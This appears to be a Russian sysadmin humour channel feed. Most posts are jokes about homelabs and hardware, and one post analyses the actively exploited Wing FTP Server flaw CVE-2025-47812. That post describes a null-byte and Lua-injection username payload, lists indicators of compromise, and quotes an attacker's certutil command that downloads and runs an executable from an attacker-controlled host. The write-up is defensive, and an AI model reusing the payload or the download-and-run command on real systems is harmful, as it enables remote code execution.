Сервер в шкафу спальни. Классика хоумлаба 🔊

Сначала ты хочешь просто поднять свой маленький VPN и файлопомойку, а через год твоя одежда особенно пахнет, плюс ты привык сладко засыпать под убаюкивающий рокот турбин.

Типичный 🥸 Сисадмин

Что-то даже захотелось выйти и продышаться после этого принесенного пк 🫁

Типичный 🏥 Сисадмин

🧠 UX на минималках, доход — на максималках.

Хитрые разрабы.

Типичный 😶 Сисадмин

Некоторые костыли становятся несущей конструкцией 🎩

Типичный 🌚 Сисадмин

С каждым могло быть 🛌

Типичный 🥸 Сисадмин

Переход от софтверщика к хардверщику произошёл успешно. Зато не троттлит.

Типичный 🥸 Сисадмин

🔥 Wing FTP Server под атакой. Разбор уязвимости и комедия ошибок от хакеров.

Новость для всех, кто использует Wing FTP Server. В нем обнаружена критическая уязвимость CVE-2025-47812, которая позволяет удаленно выполнить код с правами SYSTEM/root.

Уязвимость уже активно эксплуатируется, так что если у вас развернут этот сервер, необходимо обновиться до версии 7.4.4.

Технически, уязвимость представляет собой комбинацию из инъекции нулевого байта (%00) и инъекции кода на языке Lua в параметре имени пользователя при аутентификации (через loginok.html). Атакующий может отправить специально сформированный запрос, используя учетную запись, для которой известен пароль (или анонимную, если она включена). Полезная нагрузка в поле username выглядит примерно так: `` имя_пользователя%00]]...вредоносный_Lua_код...-- ``. Нулевой байт обрывает обработку строки с именем, ]] корректно закрывает синтаксис объекта сессии, а -- комментирует остаток оригинального кода. В результате вредоносный Lua-код записывается в файл сессии на сервере (файл с расширением .lua в директории session). При следующем обращении к серверу (например, при запросе страницы dir.html) он считывает этот файл, десериализует данные и выполняет внедренный код.

Признаки взлома можно найти в логах сервера (Log\Domains\) — ищите обрезанные записи вида `` User 'anonymous `` (без закрывающей кавычки). Более надежный способ — проверить файлы сессий в директории session на аномально большой размер или наличие подозрительного Lua-кода (например, функций для hex-декодирования или вызова io.popen). Один из реальных пейлоадов, который обнаружили исследователи, выглядел так: `` certutil -urlcache -f http://[IP_АТАКУЮЩЕГО]/[payload.exe] %TEMP%\mvveiWJHx.exe & start /B %TEMP%\mvveiWJHx.exe ``.

А теперь самое интересное как это выглядело на практике. Аналитики из Huntress разобрали реальную атаку и выяснили, что уязвимостью воспользовались, мягко говоря, не самые опытные хакеры. Их действия были похожи на комедию ошибок: они запускали базовые команды для разведки (ipconfig, whoami), пытались создавать пользователей с паролями вроде 123123qweqwe, делали опечатки в путях к файлам (например, c:^A.exe, где ^A — это управляющий символ SOH), пытались запустить встроенную команду dir как внешний бинарник и не смогли правильно составить curl-команду для скачивания своего же бэкдора. В конце концов, они попытались скачать и запустить пейлоад с помощью certutil, но его тут же удалил Microsoft Defender (Trojan:Win32/Ceprolad.A). После этого процесс WFTPServer.exe упал, и сессия атакующих оборвалась 😂😂

Эх, а ведь были прекрасные нулевые, когда для взлома сервера нужно было быть настоящим гением. А теперь достаточно просто найти готовый эксплойт на GitHub и уметь правильно скопировать команду... хотя, как видно, даже с последним у некоторых проблемы 😬

Типичный 🥸 Сисадмин

Это тот самый момент, когда дедлайны горят, техника идет на списание, а кто-то до тебя закрутил винты на VGA-кабеле с силой, достойной затяжки колесных гаек. В такие моменты отвертка становится слишком медленным инструментом.

Один щелчок кусачками и ты уже у следующего системника 😶

Типичный 🥸 Сисадмин